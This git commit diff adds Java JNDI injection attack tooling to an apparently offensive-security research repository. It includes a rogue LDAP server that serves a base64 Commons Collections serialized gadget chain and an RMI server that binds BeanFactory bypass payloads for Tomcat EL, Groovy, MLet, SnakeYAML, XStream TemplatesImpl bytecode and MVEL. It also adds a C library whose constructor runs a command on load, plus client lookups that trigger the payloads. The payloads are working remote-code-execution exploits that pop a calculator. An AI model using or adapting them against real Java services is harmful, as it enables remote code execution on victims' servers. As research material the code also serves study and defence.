add JNDI :)

Author: Whoopsunix

Expression/MVELAttack/src/main/java/com/ppp/Demo.java

@@ -13,7 +13,6 @@ public class Demo {
     public static void main(String[] args) {
         String poc = "Runtime.getRuntime().exec(\"open -a Calculator.app\")";
         System.out.println(eval(poc));
-        ;
     }
 
     public static Object eval(String poc) {

JNDIAttack/pom.xml

@@ -12,6 +12,7 @@
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <tomcat.version>8.5.78</tomcat.version>
     </properties>
 
     <dependencies>
@@ -26,6 +27,82 @@
             <artifactId>commons-collections4</artifactId>
             <version>4.0</version>
         </dependency>
+        <dependency>
+            <groupId>com.unboundid</groupId>
+            <artifactId>unboundid-ldapsdk</artifactId>
+            <version>3.1.1</version>
+            <scope>compile</scope>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-catalina</artifactId>
+            <version>${tomcat.version}</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-jasper</artifactId>
+            <version>${tomcat.version}</version>
+        </dependency>
+        <!-- JDBC -->
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-dbcp</artifactId>
+            <version>${tomcat.version}</version>
+<!--            <version>7.0.109</version>-->
+        </dependency>
+        <dependency>
+            <groupId>commons-dbcp</groupId>
+            <artifactId>commons-dbcp</artifactId>
+            <version>1.4</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-dbcp2</artifactId>
+            <version>2.12.0</version>
+        </dependency>
+        <dependency>
+            <groupId>com.h2database</groupId>
+            <artifactId>h2</artifactId>
+            <version>1.4.191</version>
+        </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>druid</artifactId>
+            <version>1.1.0</version>
+        </dependency>
+
+
+
+        <dependency>
+            <groupId>mysql</groupId>
+            <artifactId>mysql-connector-java</artifactId>
+            <version>5.1.47</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.codehaus.groovy</groupId>
+            <artifactId>groovy-all</artifactId>
+            <version>2.4.9</version>
+        </dependency>
+        <dependency>
+            <groupId>org.yaml</groupId>
+            <artifactId>snakeyaml</artifactId>
+            <version>1.33</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+            <version>1.4.17</version>
+        </dependency>
+        <dependency>
+            <groupId>org.mvel</groupId>
+            <artifactId>mvel2</artifactId>
+            <version>2.2.8.Final</version>
+        </dependency>
+
     </dependencies>
 
     <build>

JNDIAttack/src/main/java/jndi/Exec.c

@@ -0,0 +1,10 @@
+// gcc -shared -fPIC Exec.c -o Exec.dylib
+// gcc -shared -fPIC Exec.c -o Exec.so
+// gcc -m64 Exec.c -fPIC --shared -o Exec.dll
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+__attribute__ ((__constructor__)) void preload (void){
+    system("open -a Calculator");
+}

JNDIAttack/src/main/java/jndi/JNDIClient.java

@@ -25,6 +25,44 @@ public static void client2() throws Exception {
         // JDK >= 8u121
 //        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
 
-        new InitialContext().lookup("rmi://127.0.0.1:1099/Exec");
+//        new InitialContext().lookup("rmi://127.0.0.1:1099/Exec");
+//        new InitialContext().lookup("ldap://127.0.0.1:1389/Exec");
+
+
+        /**
+         * org.apache.naming.factory.BeanFactory
+//         */
+//        new InitialContext().lookup("rmi://127.0.0.1:1099/EL");
+//        new InitialContext().lookup("rmi://127.0.0.1:1098/GroovyClassLoader");
+//        new InitialContext().lookup("rmi://127.0.0.1:1097/GroovyShell");
+//        new InitialContext().lookup("rmi://127.0.0.1:1096/WebSphere");
+//        new InitialContext().lookup("rmi://127.0.0.1:1094/MLet");
+//        new InitialContext().lookup("rmi://127.0.0.1:1093/Snakeyaml");
+//        new InitialContext().lookup("rmi://127.0.0.1:1092/Lib");
+//        new InitialContext().lookup("rmi://127.0.0.1:1091/XStream");
+//        new InitialContext().lookup("rmi://127.0.0.1:1090/mvel");
+
+
+        /**
+         * org.apache.catalina.users.MemoryUserDatabaseFactory
+         */
+//        new InitialContext().lookup("rmi://127.0.0.1:1099/xxe");
+
+        /**
+         * JDBC
+         */
+//        new InitialContext().lookup("rmi://127.0.0.1:1099/tomcatDBCP2");
+//        new InitialContext().lookup("rmi://127.0.0.1:1098/tomcatDBCP");
+//        new InitialContext().lookup("rmi://127.0.0.1:1097/commonsDBCP2");
+//        new InitialContext().lookup("rmi://127.0.0.1:1096/commonsDBCP");
+//        new InitialContext().lookup("rmi://127.0.0.1:1095/tomcatH2DBCP2");
+//        new InitialContext().lookup("rmi://127.0.0.1:1094/alibabaDruid");
+
+
+        /**
+         * Test
+         */
+        new InitialContext().lookup("ldap://127.0.0.1:1389/Basic/Command/open -a Calculator.app");
+//        new InitialContext().lookup("ldap://127.0.0.1:1389/remoteExploit8");
     }
 }

JNDIAttack/src/main/java/jndi/JNDIServer.java

@@ -1,20 +1,63 @@
 package jndi;
 
-import com.sun.jndi.rmi.registry.ReferenceWrapper;
+import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
+import com.unboundid.ldap.listener.InMemoryDirectoryServer;
+import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
+import com.unboundid.ldap.listener.InMemoryListenerConfig;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
 
-import javax.naming.Reference;
-import java.rmi.registry.LocateRegistry;
-import java.rmi.registry.Registry;
+import javax.net.ServerSocketFactory;
+import javax.net.SocketFactory;
+import javax.net.ssl.SSLSocketFactory;
+import java.net.InetAddress;
 
 /**
  * @author Whoopsunix
  */
 public class JNDIServer {
+    private static final String LDAP_BASE = "dc=example,dc=com";
+
     public static void main(String[] args) throws Exception {
-        Registry registry = LocateRegistry.createRegistry(1099);
-        Reference reference = new Reference("Exec", "jndi.Exec", "http://127.0.0.1:1234/");
-        ReferenceWrapper wrapper = new ReferenceWrapper(reference);
-        registry.bind("Exec", wrapper);
-        System.out.println("run in 1099");
+        int port = 1389;
+
+        InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
+        config.setListenerConfigs(new InMemoryListenerConfig(
+                "listen", //$NON-NLS-1$
+                InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
+                port,
+                ServerSocketFactory.getDefault(),
+                SocketFactory.getDefault(),
+                (SSLSocketFactory) SSLSocketFactory.getDefault()));
+
+        config.addInMemoryOperationInterceptor(new OperationInterceptor());
+        InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
+        System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
+        ds.startListening();
+    }
+
+    private static class OperationInterceptor extends InMemoryOperationInterceptor {
+        @Override
+        public void processSearchResult(InMemoryInterceptedSearchResult result) {
+            String base = "Exec";
+            Entry entry = new Entry(base);
+            try {
+                sendResult(result, base, entry);
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
+        }
+
+        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
+            e.addAttribute("javaClassName", "");
+            // cc2 open -a Calculator.app
+            e.addAttribute("javaSerializedData", Base64.decode("rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAAdAAObmV3VHJhbnNmb3JtZXJ1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgALTAAFX25hbWVxAH4ACkwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAAAAAAB1cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAACJsr+ur4AAAAyACABADtvcmcvYXBhY2hlL3N0cnV0cy9qYXNwZXJyZXBvcnRzL2phc3BlcnJlcG9ydGNvbnN0YW50cy9WaWV3cwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlDAAFAAYKAAQACAEAIGphdmF4L3NjcmlwdC9TY3JpcHRFbmdpbmVNYW5hZ2VyBwAKCgALAAgBAAJqcwgADQEAD2dldEVuZ2luZUJ5TmFtZQEALyhMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L3NjcmlwdC9TY3JpcHRFbmdpbmU7DAAPABAKAAsAEQEAPmphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCdvcGVuIC1hIENhbGN1bGF0b3IuYXBwJyk7CAATAQAZamF2YXgvc2NyaXB0L1NjcmlwdEVuZ2luZQcAFQEABGV2YWwBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwwAFwAYCwAWABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgVx5mnuPG1HGAEADUNvbnN0YW50VmFsdWUAIQACAAQAAAABABoAGwAcAAEAHwAAAAIAHQABAAEABQAGAAEABwAAACsAAgAEAAAAHyq3AAm7AAtZtwAMTCsSDrYAEk0SFE4sLbkAGgIAV7EAAAAAAAB1cQB+ABgAAADxyv66vgAAADIAEQEAIm9yZy9hcGFjaGUvY2xpL3R5cGVoYW5kbGVyL0NvbW1vbnMHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAUamF2YS9pby9TZXJpYWxpemFibGUHAAUBAAY8aW5pdD4BAAMoKVYBAARDb2RlDAAHAAgKAAQACgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQAhAAIABAABAAYAAQAaAAwADQABABAAAAACAA4AAQABAAcACAABAAkAAAARAAEAAQAAAAUqtwALsQAAAAAAAHB0AAZhbnlTdHJwdwEAeHNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABeA=="));
+            result.sendSearchEntry(e);
+            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+        }
+
     }
 }

JNDIAttack/src/main/java/jndi/LocalBeanFactoryServer.java

@@ -0,0 +1,168 @@
+package jndi;
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+import org.apache.naming.ResourceRef;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @author Whoopsunix
+ */
+public class LocalBeanFactoryServer {
+    public static void main(String args[]) throws Exception {
+        TomcatEL();
+        GroovyClassLoader();
+        GroovyGroovyShell();
+        MLet();
+        Snakeyaml();
+        Lib();
+        XStream();
+        mvel();
+
+        System.out.println("server is running");
+    }
+
+    public static void TomcatEL() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1099);
+        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,
+                "org.apache.naming.factory.BeanFactory", null);
+
+        // BeanFactory.getObjectInstance
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=eval"));
+        ref.add(new StringRefAddr("Whoopsunix", "Runtime.getRuntime().exec('open -a Calculator.app')"));
+        // EL 表达式
+//         ref.add(new StringRefAddr("Whoopsunix", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['open','-a','Calculator.app']).start()\")"));
+
+        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
+        registry.bind("EL", referenceWrapper);
+    }
+
+    public static void GroovyClassLoader() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1098);
+        ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,
+                "org.apache.naming.factory.BeanFactory", null);
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=parseClass"));
+        String script = "@groovy.transform.ASTTest(value={\n" +
+                "    assert java.lang.Runtime.getRuntime().exec(\"open -a Calculator.app\")\n" +
+                "})\n" +
+                "def x\n";
+        ref.add(new StringRefAddr("Whoopsunix", script));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("GroovyClassLoader", referenceWrapper);
+    }
+
+    public static void GroovyGroovyShell() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1097);
+        ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true,
+                "org.apache.naming.factory.BeanFactory", null);
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=evaluate"));
+        ref.add(new StringRefAddr("Whoopsunix", "'open -a Calculator.app'.execute()"));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("GroovyShell", referenceWrapper);
+    }
+
+
+    public static void MLet() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1094);
+        ResourceRef ref = new ResourceRef("javax.management.loading.MLet", null, "", "", true,
+                "org.apache.naming.factory.BeanFactory", null);
+        ref.add(new StringRefAddr("forceString", "a=loadClass,b=addURL,c=loadClass"));
+        ref.add(new StringRefAddr("a", "java.lang.String"));
+        ref.add(new StringRefAddr("b", "http://127.0.0.1:1111/"));
+        ref.add(new StringRefAddr("c", "Find"));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("MLet", referenceWrapper);
+    }
+
+    public static void Snakeyaml() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1093);
+        ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
+                true, "org.apache.naming.factory.BeanFactory", null);
+
+        String jar = "!!javax.script.ScriptEngineManager [\n" +
+                "  !!java.net.URLClassLoader [[\n" +
+                "    !!java.net.URL [\"http://127.0.0.1:1234/SnakeyamlDemo-1.0.jar\"]\n" +
+                "  ]]\n" +
+                "]";
+
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=load"));
+        ref.add(new StringRefAddr("Whoopsunix", jar));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("Snakeyaml", referenceWrapper);
+    }
+
+    // todo 其他
+    public static void Lib() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1092);
+        ResourceRef ref = new ResourceRef("com.sun.glass.utils.NativeLibLoader", null, "", "",
+                true, "org.apache.naming.factory.BeanFactory", null);
+        ref.add(new StringRefAddr("forceString", "a=loadLibrary"));
+        ref.add(new StringRefAddr("a", "../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/Exec"));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("Lib", referenceWrapper);
+    }
+
+    public static void XStream() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1091);
+        ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "",
+                true, "org.apache.naming.factory.BeanFactory", null);
+        String xml = "<java.util.PriorityQueue serialization=\"custom\">\n" +
+                "  <unserializable-parents/>\n" +
+                "  <java.util.PriorityQueue>\n" +
+                "    <default>\n" +
+                "      <size>2</size>\n" +
+                "      <comparator class=\"org.apache.commons.collections4.comparators.TransformingComparator\">\n" +
+                "        <decorated class=\"org.apache.commons.collections4.comparators.ComparableComparator\"/>\n" +
+                "        <transformer class=\"org.apache.commons.collections4.functors.InvokerTransformer\">\n" +
+                "          <iMethodName>newTransformer</iMethodName>\n" +
+                "          <iParamTypes/>\n" +
+                "          <iArgs/>\n" +
+                "        </transformer>\n" +
+                "      </comparator>\n" +
+                "    </default>\n" +
+                "    <int>3</int>\n" +
+                "    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization=\"custom\">\n" +
+                "      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\n" +
+                "        <default>\n" +
+                "          <__name>anyStr</__name>\n" +
+                "          <__bytecodes>\n" +
+                "            <byte-array>yv66vgAAADIAIAEAKW9yZy9hcGFjaGUvY29yZS9hc3luY2NvbnRleHRpbXBsL0NhdGFsaW5hBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABjxpbml0PgEAAygpVgEABENvZGUMAAUABgoABAAIAQAgamF2YXgvc2NyaXB0L1NjcmlwdEVuZ2luZU1hbmFnZXIHAAoKAAsACAEAAmpzCAANAQAPZ2V0RW5naW5lQnlOYW1lAQAvKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvc2NyaXB0L1NjcmlwdEVuZ2luZTsMAA8AEAoACwARAQA+amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoJ29wZW4gLWEgQ2FsY3VsYXRvci5hcHAnKTsIABMBABlqYXZheC9zY3JpcHQvU2NyaXB0RW5naW5lBwAVAQAEZXZhbAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DAAXABgLABYAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQAhAAIABAAAAAEAGgAbABwAAQAfAAAAAgAdAAEAAQAFAAYAAQAHAAAAKwACAAQAAAAfKrcACbsAC1m3AAxMKxIOtgASTRIUTiwtuQAaAgBXsQAAAAAAAA==</byte-array>\n" +
+                "            <byte-array>yv66vgAAADIAEQEAPW9yZy9hcGFjaGUvcm9vdGV4dGVybmFsY29udGV4dHJlc291cmNlbG9hZGVyL215ZmFjZXMvUmVzb3VyY2UHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAUamF2YS9pby9TZXJpYWxpemFibGUHAAUBAAY8aW5pdD4BAAMoKVYBAARDb2RlDAAHAAgKAAQACgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQAhAAIABAABAAYAAQAaAAwADQABABAAAAACAA4AAQABAAcACAABAAkAAAARAAEAAQAAAAUqtwALsQAAAAAAAA==</byte-array>\n" +
+                "          </__bytecodes>\n" +
+                "          <__transletIndex>0</__transletIndex>\n" +
+                "          <__indentNumber>0</__indentNumber>\n" +
+                "        </default>\n" +
+                "        <boolean>false</boolean>\n" +
+                "      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\n" +
+                "    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\n" +
+                "    <int>1</int>\n" +
+                "  </java.util.PriorityQueue>\n" +
+                "</java.util.PriorityQueue>";
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=fromXML"));
+        ref.add(new StringRefAddr("Whoopsunix", xml));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("XStream", referenceWrapper);
+    }
+
+    public static void mvel() throws Exception {
+        Registry registry = LocateRegistry.createRegistry(1090);
+        ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "",
+                true, "org.apache.naming.factory.BeanFactory", null);
+        ref.add(new StringRefAddr("forceString", "Whoopsunix=exec"));
+        ref.add(new StringRefAddr("Whoopsunix", "Runtime.getRuntime().exec(\"open -a Calculator.app\")"));
+
+        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
+        registry.bind("mvel", referenceWrapper);
+    }
+
+
+}